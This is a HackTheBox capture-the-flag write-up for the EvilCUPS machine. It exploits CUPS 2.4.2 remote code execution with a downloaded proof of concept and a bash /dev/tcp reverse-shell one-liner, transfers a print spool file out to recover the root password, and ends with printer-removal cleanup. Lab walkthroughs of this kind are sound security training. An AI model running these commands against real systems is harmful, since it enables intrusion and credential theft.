HackTheBox EvilCUPS Writeup
Explore the fundamentals of cybersecurity in the EvilCUPS Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts#
10.10.11.40 evilcups.htb
Script to add hosts automatically#
ip="10.10.11.40"
domain="evilcups.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping#
nmap -sCV evilcups.htb
Nmap scan report for evilcups.htb (10.10.11.40)
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
|_ 256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
631/tcp open ipp CUPS 2.4
|_http-title: Bad Request - CUPS v2.4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can access the CUPS interface at http://10.10.11.40:631.
Remote Code Execution (RCE)#
This attack is described in detail here:
https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
The proof of concept (PoC) was created by the room creator and can be found here:
https://github.com/IppSec/evil-cups
Start a Listener#
Set up a listener to capture the reverse shell:
nc -lvnp 9001
Download and Set Up the Exploit#
You’ll need the Python ippserver package for the CUPS exploit.
wget https://raw.githubusercontent.com/IppSec/evil-cups/refs/heads/main/evilcups.py -O evilcups
chmod +x evilcups
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
./evilcups $vpnip 10.10.11.40 'bash -c "nohup bash -i >& /dev/tcp/'$vpnip'/9001 0>&1"&'
Trigger the RCE#
To trigger the reverse shell, go to the CUPS web interface at http://10.10.11.40:631. Find the added printer, click on “Maintenance,” and then click on “Print Test Page.”
Retrieve the User Flag#
Once you have shell access, you can retrieve the user flag:
cat /home/htb/user.txt
Explore CUPS Spool Files#
Navigate to the CUPS spool directory to inspect the files:
cd /var/spool/cups
cat d00001-001
Set up a Python HTTP server to transfer the file:
python3 -m http.server
Download and Convert the Spool File#
On your local machine, download the spool file:
wget 'http://10.10.11.40:8000/d00001-001'
Convert the file to PDF format:
ps2pdf d00001-001 d00001-001.pdf
Open the PDF to inspect its contents:
xdg-open d00001-001.pdf
Retrieve the Root Password#
With the information gathered, SSH into the box as root:
ssh root@10.10.11.40
Retrieve the root flag:
cat /root/root.txt
Good OpSec: Removing a Malicious Printer from CUPS#
List Active Printers#
Check which printers are currently active:
lpstat -p
Example:
printer Canon_MB2300_series is idle.
printer HACKED_10_10_14_2 is idle.
Attempt Printer Removal#
Try to remove the malicious printer:
lpadmin -x HACKED_10_10_14_2
Restart CUPS#
Apply changes by restarting the CUPS service:
systemctl restart cups
Verify Removal#
Check again to ensure the printer is removed:
lpstat -p
Manual Removal (If Necessary)#
If lpadmin fails, manually edit the printer configuration:
nano /etc/cups/printers.conf
Delete the section for the unwanted printer:
<Printer HACKED_10_10_14_2>
...
</Printer>
Save and exit (Ctrl + O, Ctrl + X).
Clear CUPS Cache#
Remove the CUPS job cache:
rm /var/cache/cups/job.cache
Important: Only clear spool files if you are sure there’s no sensitive data:
rm /var/spool/cups/d* /var/spool/cups/c*
Note: On this machine, avoid removing spool files because they contain the password.